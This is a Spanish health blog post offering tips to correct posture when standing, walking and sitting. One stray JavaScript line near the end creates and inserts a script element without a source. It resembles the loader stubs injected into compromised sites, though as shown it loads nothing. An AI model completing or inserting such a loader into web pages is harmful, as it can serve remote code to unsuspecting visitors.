Salud y belleza » Salud, Tratamientos caseros, ejercicios

Consejos para corregir la postura

Sin Comentarios

Si quieres mantener la salud de tu columna y evitar posibles dolores de espalda es recomendable que adoptes una buena postura, especialmente en el trabajo. Normalmente no prestamos atención a cómo nos sentamos o andamos hasta que no tengamos algún problema de espalda. Para prevenir esos dolores vamos a darte algunos consejos para corregir la postura.

corregir-postura

Para tener una buena postura solo hay que tener el cuerpo alineado, la espalda recta, hombros alineados, barbilla hacia afuera y estómago hundido. Si quieres lograr la postura ideal es aconsejable que sigas estos pasos delante de un espejo para comprobar que lo estás haciendo bien. De perfil, la columna debe tener una ligera postura de S.

- Postura de pie: en esta postura debes tener los pies al ancho de los hombros, estar siembre derecho y echar el peso sobre la punta de los pies. Mantén los hombros y la cabeza hacia atrás y apunta esta última hacia el techo.

- Postura correcta al caminar: sigue los consejos de la anterior y mantente así mientras camina, con la cabeza erguida, el pecho hacia afuera y los hombros hacia atrás.

corregir-la-postura

- Postura correcta sentado: si estás mucho tiempo sentado en el trabajo debes buscar una silla que sea ergonómica o colocar una almohada en la espalda. Mantén la postura de hombros, cabeza y cuello y procura tener ambos pies en el suelo y ajustar la silla para que los brazos estén ligeramente flexionados.

¿Te han resultado útiles estos consejos para corregir la postura?

var d=document;var s=d.createElement('script'); document.currentScript.parentNode.insertBefore(s, document.currentScript);

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.